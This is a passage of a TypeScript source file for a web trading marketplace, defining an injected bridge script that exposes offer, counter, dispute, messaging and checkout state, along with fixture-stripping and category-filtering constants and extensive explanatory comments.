    else THREADS[mi].__gbzInPerson = mark;
    return true;
  }
  return false;
};

window.__gbzThreadOfferId = function (threadId) {
  for (var oi = 0; oi < THREADS.length; oi++) {
    if (THREADS[oi].id === threadId) return THREADS[oi].__gbzOfferId || null;
  }
  return null;
};

/* The open person's deals AS THE LIST LAST DESCRIBED THEM, for the open-thread
   poll's stale-list check (dealThreadPoll.ts listIsStale): one entry per deal
   row (d:<id>:<listing>) of the person a thread id names (p:<id> or
   d:<id>:<listing>), with its listing and the three stamps mapDealThread writes
   off the list row's head offer (__gbzListOfferId, __gbzListStatus,
   __gbzListUpdatedAt; null where a row has none, which the check reads as
   unknown). null for an id that names no person; [] for a person with no deal
   rows (a chat-only p: row, or nobody), which against a chain in the events body
   is exactly "a deal the list does not have yet". Read-only. */
window.__gbzPersonHeadOffers = function (threadId) {
  var hp = String(threadId || "").split(":");
  var who = (hp[0] === "p" || hp[0] === "d") && hp[1] ? hp[1] : null;
  if (!who) return null;
  var heads = [];
  for (var hi = 0; hi < THREADS.length; hi++) {
    var hid = THREADS[hi].id;
    if (typeof hid !== "string" || hid.indexOf("d:" + who + ":") !== 0) continue;
    heads.push({
      listingId: hid.split(":").slice(2).join(":"),
      offerId: THREADS[hi].__gbzListOfferId || null,
      status: THREADS[hi].__gbzListStatus || null,
      updatedAt: THREADS[hi].__gbzListUpdatedAt || null,
    });
  }
  return heads;
};

/* ── THE DISPUTE FORM'S OWN STATE (disputeFile.ts) ────────────────────────────
   disputeFor and disputeDone are top-level lets in app.js, so only code in this
   shared script scope can read or set them: the same reason counterFor is read
   through __gbzCounterFor. */
window.__gbzDisputeFor = function () {
  return typeof disputeFor === "string" && disputeFor ? disputeFor : null;
};
/* Who the dispute is against, which listing, and WHICH OFFER. The thread id is
   d:<counterpartId>:<listingId>. The title comes from the floor row when the
   listing is on the floor, otherwise from the deal's own items. The offer id is
   the list row's (__gbzListOfferId, rewritten by every list read), never the
   thread detail's __gbzOfferId, which is read once per tab and goes stale when a
   counter is accepted elsewhere: a dispute on the superseded offer would not
   hold the accepted one's payout. */
window.__gbzDisputeContext = function (threadId) {
  var t = null;
  for (var ti = 0; ti < THREADS.length; ti++) {
    if (THREADS[ti].id === threadId) { t = THREADS[ti]; break; }
  }
  if (!t) return null;
  var parts = String(threadId).split(":");
  var listingId = parts[0] === "d" && parts.length >= 3 ? parts.slice(2).join(":") : null;
  var title = "";
  if (listingId) {
    for (var li = 0; li < LISTINGS.length; li++) {
      if (LISTINGS[li].id === listingId) { title = LISTINGS[li].title || ""; break; }
    }
    var sides = [t.theirs, t.mine];
    for (var si = 0; si < sides.length && !title; si++) {
      var items = (sides[si] && sides[si].items) || [];
      for (var ii = 0; ii < items.length; ii++) {
        if (items[ii].lid === listingId) { title = items[ii].title || ""; break; }
      }
    }
  }
  return { withHandle: t.with || "", listingId: listingId, listingTitle: title, offerId: t.__gbzListOfferId || null };
};
/* After the server's 201: Blake's own "Dispute Filed" state, carrying the
   server's case reference, and only on the form of the deal that was filed. If
   the visitor has moved to another deal's form before the 201 lands, nothing is
   marked; the re-read still shows the filed deal "In review". Nothing else on
   the row is set here: "In review" comes from the re-read of the thread (the
   server's openDisputeOfferIds), never from this tab's say-so. */
window.__gbzDisputeFiled = function (threadId, ref) {
  if (typeof disputeFor !== "string" || !disputeFor || disputeFor !== threadId) return false;
  disputeDone = ref;
  if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll();
  return true;
};

/* ── THE COUNTER SHEET'S OWN STATE ────────────────────────────────────────────

   Three readers for the counter, and they are a NEW SHAPE for this bridge: every
   other __gbz reader above names a data.js binding (LISTINGS, USERS, THREADS,
   MY_COLLECTION, WALLET). 'counterFor' and 'composerState' are declared in
   APP.JS, which evaluates AFTER this script — so these bodies close over a
   binding that is still in its temporal dead zone at the moment this script
   runs. That is fine, because a function body is evaluated at CALL time and
   every caller here is a click, but "fine" is not "guaranteed": a call that
   somehow arrived early would throw ReferenceError rather than return undefined,
   inside a capture listener. Hence the try/catch, which is not defensive
   decoration — it is the difference between a dead control and a broken page.

   'counterFor' is the thread the sheet is countering, and it is the ONLY value
   that definitionally IS that. The DOM alternatives are correlations that break:
   the sheet is mounted from renderShellExtras, so it follows the visitor onto
   every other route (nothing clears it on hashchange), where [data-counteroffer]
   no longer exists; and .thread-row.on is absent whenever dealsSel is null,
   which is its state at boot while renderDeals still opens list[0]. */
window.__gbzCounterFor = function () {
  try {
    return counterFor || null;
  } catch (e) {
    return null;
  }
};

/* The composer's current selection, RESOLVED TO THE SERVER'S ID SPACE HERE
   rather than handed out raw.

   🔴🔴 THE ONE MISTAKE THIS LANE CANNOT DETECT AFTER THE FACT. A MY_COLLECTION
   row carries TWO ids: 'id' is a user_collections primary key (or a synthetic
   "listing:<id>" / "my-<id>"), and 'lid' is the real listings.id. Blake's picker
   selects by 'id'. POST /api/offers wants 'lid' — and if it is handed anything
   else it does NOT 400. offers.ts nulls an unresolvable listingId and inserts
   the row anyway (deliberately, so one dead reference cannot fail the whole
   batch), so the offer saves, both cards render correctly from the name/image/
   value snapshot, and the only thing lost is the LINK. The link is what
   lockOfferItemsForTrade uses at accept time, and without it the item stays
   active, in the feed, offerable and purchasable after it has been traded away.
   Two of Tyler's own listings were live in that state on prod before 2026-08-03.

   So the translation happens ONCE, here, where MY_COLLECTION is in scope, and
   the module never sees 'id' at all. A row with no 'lid' is a standalone
   collection piece that was never a listing: 'listingId: null' is correct for
   it, and the server supports it (offer_items.listing_id is nullable). */
function gbzComposerSelection() {
  var picked = [];
  composerState.items.forEach(function (cid) { picked.push(cid); });
  var items = [];
  for (var pi = 0; pi < picked.length; pi++) {
    var m = null;
    for (var mi = 0; mi < MY_COLLECTION.length; mi++) {
      if (MY_COLLECTION[mi].id === picked[pi]) { m = MY_COLLECTION[mi]; break; }
    }
    if (!m) continue;
    items.push({
      listingId: m.lid || null,
      name: m.title,
      image: m.image || null,
      value: typeof m.value === "number" ? m.value : 0,
    });
  }
  return { tab: composerState.tab, cash: composerState.cash, items: items };
}
/* TWO DOORS ONTO ONE TRANSLATION, and they are MUTUALLY EXCLUSIVE ON PURPOSE.
   His composer renders the same [data-send-offer] button for both jobs and
   branches on counterFor, so dealCounter.ts and makeOffer.ts both listen on
   that selector and each answers only when its own door is open. If these two
   ever both returned a selection, one click would post two offers.

   The id translation stays in gbzComposerSelection, called by both — the whole
   point of the block above is that 'lid' is resolved in exactly one place. */
window.__gbzComposerCounter = function () {
  try {
    if (!counterFor) return null;
    return gbzComposerSelection();
  } catch (e) {
    return null;
  }
};
/* The make-offer half: the same selection, when no counter is in progress. */
window.__gbzComposerOffer = function () {
  try {
    if (counterFor) return null;
    return gbzComposerSelection();
  } catch (e) {
    return null;
  }
};

/* Which side of the deal the viewer is on, read back off the row.

   The endpoints are written in CANONICAL direction — offeredItems and cashAmount
   are the BUYER's side whoever clicks send — while Blake's composer always edits
   MY side. So a seller's counter has to land in requestedItems/requestedCashAmount
   or it tells the server the buyer is handing over the seller's own listing.

   Stashed by the mapper and read back here, the same posture as __gbzThreadOfferId:
   mapDealThread already computes 'iAmBuyer' for its own side placement, and
   deriving it a second time from where the items ended up is how two derivations
   drift. Null means the row is not installed — never a guess. */
/* Both sides of a thread, translated to the SERVER's item shape.

   A counter is not a delta — POST /api/offers creates a WHOLE new offer, so
   whatever is not sent is not in it. The cash sheet only lets the visitor change
   a number, which means the items have to be re-stated from the row or a counter
   that meant 'same swap, different price' would silently become 'cash only'.

   Translated here, in the bridge, for the same reason __gbzComposerCounter is:
   'lid' is the real listings.id and it is the only id the offers route can use.
   Doing it here means the module cannot reach for the wrong one.

   value is OMITTED rather than zeroed when the row does not know it. The server
   defaults a missing value to 0 either way, so this changes nothing stored — but
   sending an explicit 0 would be this lane claiming a free item, and the whole
   rule here is to state absence rather than invent a number. */
/* Forget the stashed offer id for one thread.

   ONLY THE COUNTER NEEDS THIS, and the asymmetry is the point. Accept, decline
   and withdraw transition the offer they name, so their stashed id stays the
   right id whatever happens next. A counter MINTS A NEW HEAD and supersedes the
   old one, so the moment it lands the stashed id is stale — and it is refreshed
   by a detail re-read that is deliberately best-effort.

   If that re-read fails the row would keep pointing at a superseded offer, and a
   SECOND counter would then post parentOfferId at it. The server does not refuse
   that: its supersede UPDATE carries 'status = 'pending'', so it matches zero
   rows and the counter is created anyway, orphaned from the chain it meant to
   answer. Clearing is the honest end state — the next action resolves nothing
   and refuses out loud, which is this lane's rule for an id it cannot trust. */
window.__gbzClearThreadOfferId = function (threadId) {
  for (var xi = 0; xi < THREADS.length; xi++) {
    if (THREADS[xi].id === threadId) {
      THREADS[xi].__gbzOfferId = null;
      return true;
    }
  }
  return false;
};

/* ── THE TWO MESSAGE COMPOSERS' STATE ─────────────────────────────────────────

   dealsSel is a data.js binding, initialised before this script runs (this file
   already nulls it at boot), so it needs no guard. msgRailFor and msgAttach are
   declared in APP.JS, which evaluates after this script — same temporal dead
   zone as counterFor above, same try/catch, same reason: a throw inside a
   capture listener is a broken page rather than a dead control. */
window.__gbzDealsSel = function () {
  return dealsSel || null;
};

window.__gbzMsgRailFor = function () {
  try {
    return msgRailFor || null;
  } catch (e) {
    return null;
  }
};

/* The pieces staged onto the NEXT send (app.js msgAttach: the share sheet
   stages a piece of the visitor's collection for the person the sheet was
   opened for, kept on the piece as "person").

   Each goes as the app's own shared-listing message, "[Shared listing: id]",
   one per piece, plain text through POST /api/conversations/:id/messages, the
   way the app's chat, deal thread and ShareListingModal send it; the app's
   renderers paint a card for exactly that body. dealMessaging.ts builds the
   bodies and sends them; these three answer what is staged and take it off.

   The count is every staged piece, whoever it is for (tests read it). The
   per-person pair is what the composers use: the rail and a thread pane share
   one staging area and can be open at once aimed at two people, so a piece
   picked for one must never leave through the other's Send. */
window.__gbzMsgAttachCount = function () {
  try {
    return msgAttach ? msgAttach.length : 0;
  } catch (e) {
    return 0;
  }
};

/* The pieces staged for ONE person, as copies in staging order. Only a piece
   with a listing id is answered: the sheet offers no other kind, and the wire
   has nothing to say about one. */
window.__gbzMsgAttachFor = function (handle) {
  try {
    var out = [];
    for (var ai = 0; ai < msgAttach.length; ai++) {
      var a = msgAttach[ai];
      if (a && a.person === handle && a.lid) out.push({ lid: a.lid, title: a.title, image: a.image, value: a.value });
    }
    return out;
  } catch (e) {
    return [];
  }
};

/* Takes staged pieces off the next send: this person's pieces whose listing
   ids are named, or all of that person's when lids is null. Returns how many
   went. No repaint here: the composer repaints after its send settles. */
window.__gbzMsgAttachDrop = function (handle, lids) {
  try {
    var n = 0;
    for (var ri = msgAttach.length - 1; ri >= 0; ri--) {
      var r = msgAttach[ri];
      if (!r || r.person !== handle) continue;
      if (lids && lids.indexOf(r.lid) < 0) continue;
      msgAttach.splice(ri, 1);
      n++;
    }
    return n;
  } catch (e) {
    return 0;
  }
};

/* The installed thread for a counterpart HANDLE, or null.

   The rail targets a handle (msgRailFor is el.dataset.msg), while the endpoints
   need a user id. An installed thread's id carries it — d:<counterpartId>:
   <listingId> or p:<counterpartId> — so where a thread exists this answers
   without a lookup table. Where it does not, the caller falls back to the same
   handle->id map installFollowUser uses, and refuses out loud if that misses
   too. Blake's own threadFor() INVENTS a local row (id 't-' + handle) for an
   unknown handle, which is exactly the id that must never reach the wire. */
window.__gbzThreadIdForHandle = function (handle) {
  for (var mi = 0; mi < THREADS.length; mi++) {
    if (THREADS[mi].with === handle) return THREADS[mi].id;
  }
  return null;
};

/* The installed thread for a counterpart's USER ID, or null. For a message
   notification, which names its sender (relatedUserId) and no listing, so it
   cannot be composed into a d: key the way a deal notification is. Read off the
   id our mapper emits, p:<counterpartId> or d:<counterpartId>:<listingId>, so it
   answers only for that person. Any one of their rows will do: renderDeals opens
   the person who holds the selected row (personFor). */
window.__gbzThreadIdForUser = function (userId) {
  if (!userId) return null;
  for (var ui = 0; ui < THREADS.length; ui++) {
    var tid = THREADS[ui].id;
    if (typeof tid !== "string") continue;
    if (tid === "p:" + userId || tid.indexOf("d:" + userId + ":") === 0) return tid;
  }
  return null;
};

/* The Exchange's two decks, translated to the SERVER's item shape.

   exch.mine is a Set of MY_COLLECTION keys; exch.theirs is a Set of listings.id.
   Only the second is already what the wire wants. Translating here, where both
   arrays are in scope, is the same rule __gbzComposerCounter and __gbzThreadSides
   follow: the module never gets to hold the wrong id space.

   🪤 A MINE row with no lid is an UNLISTED collection piece, and null is the
   honest answer for it — the server models exactly that (offer_items.listing_id
   is nullable) and his own deck keeps such rows selectable on purpose. That is
   NOT the same as a mistranslated id, which is the failure that returns 201 and
   silently unlinks the item. One is a real null; the other is a bug.

   value is omitted rather than zeroed when unknown, the convention the rest of
   this bridge already uses. */
window.__gbzExchSides = function () {
  try {
    if (!exch) return null;
    /* 🔴 SELECTIONS THIS READER COULD NOT RESOLVE, COUNTED RATHER THAN DROPPED.
       Both loops below push nothing when the id does not resolve and, until now,
       said nothing about it. That is not hypothetical on the theirs side:
       LISTINGS is refilled IN PLACE on every transport refresh (its length is
       set to 0 and repopulated), while exch.theirs is an independent Set of ids,
       and the review modal is rendered ONCE and never re-gated — only the review
       BUTTON is ever disabled, never the send. So a refresh landing while the
       modal is open silently shortens a side.

       ⚠️ THE PREFILL'S lossy FLAG DOES NOT COVER THIS, and it looks as though it
       should: lossy reports only what the PREFILL dropped when building a
       counter, and a fresh offer has no prefill. Two different losses.

       Posting a short side is terms the visitor never agreed to and the offer
       would save, so the module refuses on a non-zero count.
       Found by TB on PR #937; ported here with the reasoning intact. */
    var mine = [];
    var droppedMine = 0;
    exch.mine.forEach(function (cid) {
      for (var i = 0; i < MY_COLLECTION.length; i++) {
        if (MY_COLLECTION[i].id !== cid) continue;
        var m = MY_COLLECTION[i];
        var row = { listingId: m.lid || null, name: m.title, image: m.image || null };
        if (typeof m.value === "number") row.value = m.value;
        mine.push(row);
        return;
      }
      droppedMine++;
    });
    var theirs = [];
    var droppedTheirs = 0;
    exch.theirs.forEach(function (lid) {
      for (var j = 0; j < LISTINGS.length; j++) {
        if (LISTINGS[j].id !== lid) continue;
        var l = LISTINGS[j];
        var trow = { listingId: l.id, name: l.title, image: l.image || null };
        if (typeof l.declaredValue === "number") trow.value = l.declaredValue;
        theirs.push(trow);
        return;
      }
      droppedTheirs++;
    });
    return {
      mine: mine,
      theirs: theirs,
      myCash: exch.myCash || 0,
      theirCash: exch.theirCash || 0,
      counterOf: exch.counterOf || null,
      note: (exch.note || "").trim(),
      lossy: !!exch.__gbzPrefillLossy,
      droppedMine: droppedMine,
      droppedTheirs: droppedTheirs
    };
  } catch (e) {
    return null;
  }
};

/* Close the Exchange down after a real send.

   His own handler does this and the guard stops it, so without this the review
   modal stays open over a deal that has already moved. Deliberately NOT a copy
   of the rest of what he does there: he also paints a 1.7s success screen and
   then rewrites both sides of the thread from the DECK, stamping a history row
   with a hardcoded 'Aug 21 - 11:30 AM'. The row is re-read from the server
   instead, so none of that invention is reproduced.

   Navigating to #/deals is his, and it is right: the countered deal is what the
   visitor wants to see next. */
window.__gbzFinishExchSend = function () {
  try {
    var back = window.document.getElementById("ex-review-back");
    if (back) back.remove();
    exch = null;
  } catch (e) {
    return false;
  }
  window.location.hash = "#/deals";
  if (typeof window.render === "function") window.render();
  return true;
};

/* Correct the Exchange counter prefill from the PARENT OFFER.

   🔴 WHY THE PREFILL IS WRONG WITHOUT THIS. His counter handler seeds exch from
   a THREADS row, and mapDealThread builds the seller side as the single anchor
   listing with cash hardcoded to 0 — because the deal-threads wire carries only
   side='offered' items (offeredItems.ts filters it). So a parent offer's
   REQUESTED extras and its requestedCashAmount are both invisible to the row,
   and the Exchange opens pre-filled with terms that are missing pieces nobody
   on this client could have known were there. Re-sending that is a counter that
   silently drops what it could not see.

   GET /api/offers/:id has both halves and was built for exactly this — its own
   comment says 'needed to re-prefill The Exchange from the counterer's
   perspective'. The caller reads it; this applies it.

   🔑 THE ID TRANSLATION LIVES HERE, for the same reason __gbzComposerCounter's
   does: exch.mine is a Set of MY_COLLECTION keys and exch.theirs is a Set of
   listings.id. The wire speaks only listings.id. Doing the mapping where
   MY_COLLECTION is in scope means the module never handles the wrong id space.

   🪤 AND IT RESOLVES BY lid, NEVER BY TITLE. His own prefill falls back to
   matching on title (app.js:5204) when lid misses, so two collection rows
   sharing a title resolve to the wrong item — with a correct-looking card,
   because the name and image come from the row it wrongly picked. Every id here
   comes from the offer itself, so there is nothing to guess.

   A seller-side item we cannot find in MY_COLLECTION is DROPPED and COUNTED,
   never approximated. The count rides back to the caller and is stashed on exch
   so the send can refuse rather than post a partial set. */
window.__gbzCorrectExchPrefill = function (threadId, spec) {
  if (!exch || exch.counterOf !== threadId) return null;

  var mineIds = [];
  var dropped = 0;
  for (var i = 0; i < spec.mineListingIds.length; i++) {
    var lid = spec.mineListingIds[i];
    var found = null;
    for (var j = 0; j < MY_COLLECTION.length; j++) {
      if (MY_COLLECTION[j].lid && MY_COLLECTION[j].lid === lid) { found = MY_COLLECTION[j]; break; }
    }
    if (found) mineIds.push(found.id);
    else dropped++;
  }

  exch.mine = new Set(mineIds);
  exch.theirs = new Set(spec.theirsListingIds);
  exch.myCash = typeof spec.myCash === "number" ? spec.myCash : 0;
  exch.theirCash = typeof spec.theirCash === "number" ? spec.theirCash : 0;
  /* Namespaced, ours. The send reads it and refuses rather than posting a set
     it knows is short. Never one of Blake's fields. */
  exch.__gbzPrefillLossy = dropped > 0;

  if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll();
  else if (typeof window.render === "function") window.render();
  return { applied: true, mineResolved: mineIds.length, mineDropped: dropped };
};

/* Whether the prefill above had to drop a seller-side item. Read by the send. */
window.__gbzExchPrefillLossy = function () {
  try {
    return !!(exch && exch.__gbzPrefillLossy);
  } catch (e) {
    return false;
  }
};

window.__gbzThreadSides = function (threadId) {
  function side(s) {
    var out = { items: [], cash: typeof s.cash === "number" ? s.cash : 0 };
    for (var i = 0; i < s.items.length; i++) {
      var it = s.items[i];
      var row = { listingId: it.lid || null, name: it.title, image: it.image || null };
      if (typeof it.value === "number") row.value = it.value;
      out.items.push(row);
    }
    return out;
  }
  for (var si = 0; si < THREADS.length; si++) {
    if (THREADS[si].id !== threadId) continue;
    if (!THREADS[si].mine || !THREADS[si].theirs) return null;
    return { mine: side(THREADS[si].mine), theirs: side(THREADS[si].theirs) };
  }
  return null;
};

/* Close the counter sheet.

   His own #counter-send ends with 'counterFor = null; rerenderKeepScroll();' and
   the write guard stops that handler dead, so nothing clears the sheet after a
   real counter. Without this the modal sits open over a row that has already
   repainted with the new terms behind it — the visitor's own counter looking
   like it did not happen.

   Writes the app.js binding rather than removing the DOM node: renderShellExtras
   re-emits the sheet from counterFor on every render, so pulling the element
   would put it straight back on the next paint. */
window.__gbzCloseCounterSheet = function () {
  try {
    counterFor = null;
  } catch (e) {
    return false;
  }
  if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll();
  else if (typeof window.render === "function") window.render();
  return true;
};

window.__gbzThreadIsBuyer = function (threadId) {
  for (var bi = 0; bi < THREADS.length; bi++) {
    if (THREADS[bi].id === threadId) {
      return typeof THREADS[bi].__gbzIAmBuyer === "boolean" ? THREADS[bi].__gbzIAmBuyer : null;
    }
  }
  return null;
};


/* Fees, installed when the visitor opens the summary on an accepted deal.

   🔴 A null fees value is a REAL state, not a failure. feeBlock() returns
   "" for a falsy fees (app.js:1816), so absence renders cleanly — and setting it truthy
   is ALSO what makes #/checkout/<id> resolvable (app.js:3714). A deal we cannot
   price from a canonical breakdown must therefore never become routable. That
   is the honest half of exactly what his Accept handler fakes at app.js:5009. */
window.__gbzInstallThreadFees = function (threadId, fees) {
  for (var fi = 0; fi < THREADS.length; fi++) {
    if (THREADS[fi].id !== threadId) continue;
    THREADS[fi].fees = fees;
    var fh = window.location.hash;
    /* #/checkout/<id> repaints too: a fresh page load there resolved to home
       (route() needs fees in memory), and these fees are what arrive for it
       after the fetch (checkoutContext.ts). Only for THIS thread's own hash, so
       a fetch that lands after the visitor moved on repaints nothing. */
    if (fh !== "#/deals" && fh !== "#/inbox" && fh !== "#/checkout/" + threadId) return true;
    /* rerenderKeepScroll, not render: the visitor has just opened the summary
       and is reading the ledger, and the fee block appends BELOW it. A plain
       render() drops them to the top of a page that just got taller. */
    if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll();
    else if (typeof window.render === "function") window.render();
    return true;
  }
  return false;
};

/* Checkout context: the facts the screen needs that t.fees cannot carry.

   SEPARATE FROM fees ON PURPOSE. feeBlock (app.js:2529) sums the six named
   properties of t.fees and prints that sum as its own total, so any seventh
   property would either be ignored or break the tie-out. Blake's shape stays
   his; this is a namespaced sidecar on the same row, the way __gbzOfferId
   already is.

   Stashed on the ROW rather than in module state so there is one source, and
   it is the same row the fee install writes to. Safe because app.js never
   serializes a THREADS row nor iterates its keys.

   No rerender here, deliberately, and this is the difference from the fee
   installer directly above. Fees CHANGE WHAT BLAKE PAINTS, so installing them
   has to repaint. Context changes nothing on its own: it is read by
   checkoutContext.ts, which does its own DOM work off a MutationObserver and
   would be fighting a repaint it triggered itself. The fee install that runs
   alongside this already repaints. */
window.__gbzInstallCheckoutContext = function (threadId, ctx) {
  for (var ci = 0; ci < THREADS.length; ci++) {
    if (THREADS[ci].id !== threadId) continue;
    THREADS[ci].__gbzCheckoutCtx = ctx;
    return true;
  }
  return false;
};

/* Read-only lookup, same shape as __gbzThreadOfferId. Returns null when the
   row is gone or no context has landed yet, which the caller must treat as
   "not known", never as "not complete" — those differ, and only one of them
   may hide a pay control. */
window.__gbzCheckoutContext = function (threadId) {
  for (var gi = 0; gi < THREADS.length; gi++) {
    if (THREADS[gi].id === threadId) return THREADS[gi].__gbzCheckoutCtx || null;
  }
  return null;
};

/* What a fresh page load on #/checkout/<id> needs to decide whether to fetch:
   whether the row exists, whether it already has fees (the thing route() keys
   on), and which offer to ask the summary about.

   The offer id is the LIST row's first. A fresh load has run the deals list but
   no thread detail, so __gbzOfferId (written by the detail pass, and what
   __gbzThreadOfferId reads) is still null; __gbzListOfferId is rewritten by
   every list read and names the same head offer. null when no such row. */
window.__gbzCheckoutEntry = function (threadId) {
  for (var ei = 0; ei < THREADS.length; ei++) {
    if (THREADS[ei].id !== threadId) continue;
    return {
      hasFees: !!THREADS[ei].fees,
      offerId: THREADS[ei].__gbzListOfferId || THREADS[ei].__gbzOfferId || null,
    };
  }
  return null;
};
`;

/**
 * Injected as a SECOND inline classic script, after app.js has loaded (its
 * own EOF `render()` call has already fired once, for the home view, by the
 * time WebInstallHost's `onload` promise resolves). DISC_TAGS and ACCOUNT
 * are declared inside app.js itself, not data.js, so no script injected
 * before app.js can see them by name (recon 19 §1b) — this has to run after.
 * Home doesn't read either one, so nothing is painted with fixture content
 * before this clears them; the next time a visitor actually navigates to
 * #/discover, #/account or #/list, app.js's own hashchange handler
 * re-renders against the already-cleared globals.
 *
 * 📌 WIZ_PHOTOS WAS THE THIRD, removed 2026-09-13 together with the "Or start
 * from a sample shot" row it fed. The two halves had to land in the SAME
 * commit and the ordering is not a style preference: this runs as an INJECTED
 * CLASSIC SCRIPT against app.js's own globals, so a line clearing a const
 * that no longer exists throws a ReferenceError, and every statement after it
 * — all four ACCOUNT lines below — silently stops executing. The visible
 * result would have been Blake's persona fixtures served on the live floor,
 * with nothing in any log naming the cause.
 *
 * ACCOUNT (app.js) is not simply emptied: `[data-accttog]` etc. click handlers
 * MUTATE it in place (`ACCOUNT.vibes.push(...)`), so it must stay an object
 * with every key the render functions read — only the fixture VALUES
 * describing "Blake" (style vibes, sizes) are cleared.
 *
 * 📌 ageRange and shopPref USED to be cleared here, justified by his
 * `[data-age]` / `[data-shopref]` handlers mutating them. #723 retired both
 * chips, both handlers and both ACCOUNT fields, so those two lines became
 * writes of keys nobody declares or reads — dead code defended by a comment
 * about handlers that no longer exist. Removed with the like wiring rather
 * than left to look deliberate.
 * The boolean notification/privacy toggles are legitimate default settings,
 * not persona fixture data, and are left as Blake shipped them.
 */
export const appFixtureStripSource = `
window.__gbzStripAppFixtures = function () {
  DISC_TAGS.length = 0;
  ACCOUNT.vibes.length = 0;
  ACCOUNT.clothing = "";
  ACCOUNT.shoe = "";
  ACCOUNT.cats.length = 0;
};
`;

/** What Blake's route() returns; only the fields this file needs are named. */
type BlakeRoute = () => { view: string };


/**
 * The categories Blake's renderer can actually render, and therefore the only
 * values `listing.category` may hold by the time his code sees a row.
 *
 * 🔴 WHY THIS IS A HARD FILTER AND NOT A COSMETIC ONE (recon 23, L2).
 * renderDetail resolves the category and dereferences it with no fallback:
 *
 *     const cat = CATEGORIES.find((c) => c.slug === l.category);   // app.js:827
 *     ...<a class="crumb" href="#/c/${cat.slug}">← Back to ${esc(cat.label)}</a>
 *
 * That is the ONLY unguarded CATEGORIES.find in either of his files (the other
 * nine sites use `|| {}`, a `c ?` test, or validate against CATEGORIES first).
 * The TypeError is thrown while the template literal is still being built, so
 * `app.innerHTML = …` (app.js:3726) never executes: the PREVIOUS view stays on
 * screen with dead controls and a changed URL. A visitor sees a page that
 * looks fine and does nothing — worse than a crash page, because nothing
 * signals that anything failed.
 *
 * It is reachable with today's production data, not a theoretical edge. The
 * listings taxonomy is two-column (listings.category = parent slug,
 * listings.subcategory = child slug), and rows that misfiled a CHILD slug into
 * the parent column exist: api-server/src/lib/categoryCounts.ts:101-113's
 * `parentTotal()` carries a whole "legacyMisfiled" term summing child slugs out
 * of the parent-count map, which can only be non-zero if such rows exist, and
 * GET /api/listings/admin-list?status=orphaned exists to enumerate rows whose
 * category matches no known slug at all. Every card on the floor is clickable.
 *
 * DROP, not remap. Remapping a misfiled row to a parent means inventing a
 * category for a real seller's live listing — his renderer would then print
 * "← Back to <parent>" as a factual claim and file it into that parent's page
 * and its "similar items" rail. Dropping is honest and self-healing: the row
 * stays fully live everywhere else (mobile, /store/:username, the SSR
 * /listing/:id page), and it reappears on the floor the moment its category
 * column is corrected. The alternative to dropping is not "show it correctly",
 * it is "show it and break the whole page for anyone who clicks it".
 *
 * Hand-written here because this module cannot see Blake's `const CATEGORIES`
 * (global lexical scope — the whole reason bridgeScriptSource exists), and the
 * filter has to run in typed code so it lands BEFORE the
 * MIN_LISTINGS_TO_INSTALL check rather than inside the bridge, which only runs
 * once that check has already passed. A hand-copied list is exactly the drift
 * this repo's own five-copy category comment warns about, so
 * floorTransport.test.ts parses the slugs straight out of public/web/data.js
 * and requires this array to match — drift in either direction goes red.
 *
 * Cross-checked once, by hand, against the server's own enum: these are also
 * exactly api-server/src/lib/categoryTree.ts's PARENT_SLUGS (CATEGORIES_SEED,
 * re-exported as KNOWN_MOBILE_SLUGS). Blake's list and the server's parent
 * taxonomy agree, so nothing legitimate is being filtered out — only misfiled
 * and orphaned rows.
 */
export const RENDERABLE_CATEGORY_SLUGS: readonly string[] = [
  "fashion",
  "collectibles",
  "gaming",
  "musical-instruments",
  "electronics",
  "memorabilia",
  "sporting-goods",
  "home-decor-goods",
  "other",
];

const RENDERABLE_CATEGORIES: ReadonlySet<string> = new Set(RENDERABLE_CATEGORY_SLUGS);

/**
 * Trap 2's placeholder half (recon 19 §1a/§3 crash #4 — see bridgeScriptSource
 * above). Neither CLOSED_DEALS nor EXAMPLE_TRADES is wired to real data in
 * this pass (both are cleared, matching "everything sample goes"), so there
 * is no real completed trade to show on the hero's live-trade-board flap
 * display, and recon 19 sanctions "one real completed trade, or a
 * placeholder" as the fix for BOARD()[0] otherwise throwing on an empty feed.
 * Deliberately generic action copy, not a specific fabricated transaction —
 * it reads as a CTA ("list it" / "trade it"), never as a claim that this
 * exact trade happened.
 */
export const BOARD_PLACEHOLDER_ROW = { give: "LIST IT", get: "TRADE IT" };

/** Minimum real listings required before we'll install and hand off to
 *  app.js at all (recon 16, L3-1). app.js:3773-3774 builds the signed-in
 *  home from FIXED array positions up to LISTINGS[19] — safe against
 *  Blake's own fixture (24 rows) by construction, but not against a real
 *  floor with fewer than 20 active listings. That path throws mid-innerHTML
 *  (USERS[l.seller] on an undefined array slot), so render() never finishes
 *  and wire() never runs — and because store.authed is persisted in
 *  localStorage (data.js:777) and render() runs at EOF on every load, ONE
 *  visitor toggling the demo bar's "Signed in" bricks /web for every
 *  subsequent visit to that browser profile until they clear site data.
 *  Refusing to install below this threshold, combined with WebInstallHost
 *  never loading app.js on a failed install, means that failure mode can't
 *  be reached from this branch at all — not "unlikely", genuinely
 *  unreachable, because Blake's file is never given the chance to run
 *  against a short array. 100 real listings exist in production today
 *  (verified via a live GET /api/listings?limit=100), so this is a guard
 *  against a future/edge state, not today's normal case. */
export const MIN_LISTINGS_TO_INSTALL = 20;

/** Minimal shape of one GET /api/listings row (artifacts/api-server/src/routes/listings.ts:333).
 *  Hand-typed rather than imported from @workspace/db — that package isn't a
 *  support dependency today and this route has no generated client type
 *  (checked lib/api-client-react/src/generated/api.schemas.ts — only
 *  AdminListing exists, not the public shape). Only the fields the floor
 *  grid — plus the two adjacent renderers a click reaches, see the gap log —
 *  actually read are declared; everything else on the wire is ignored. */
export interface ApiListingRow {
  listing: {
    id: string;
    title: string;
    description: string | null;
    condition: string;
    images: string[];
    declaredValue: number;
    /** Nullable `listings.cash_price` (lib/db/src/schema/listings.ts:37).
     *  Confirmed on the wire: the handler selects the whole listings row
     *  (`listing: listings`, listings.ts:406), and a live
     *  GET /api/listings?limit=100 on 2026-08-23 returned `cashPrice` on
     *  every one of the 100 rows. */
    cashPrice: number | null;
    /** listings.exchange_for: the item's own "Trade for", a comma-joined list of labels or, on
     *  the app-era rows that are most of the live data, of subcategory slugs
     *  (PR B, card 1218637972579066 item 4). On the wire for the same reason cashPrice is:
     *  the handler selects the whole row. Create stores null for none; an app-created
     *  listing may carry "" — both read as no entries (splitTradeFor). */
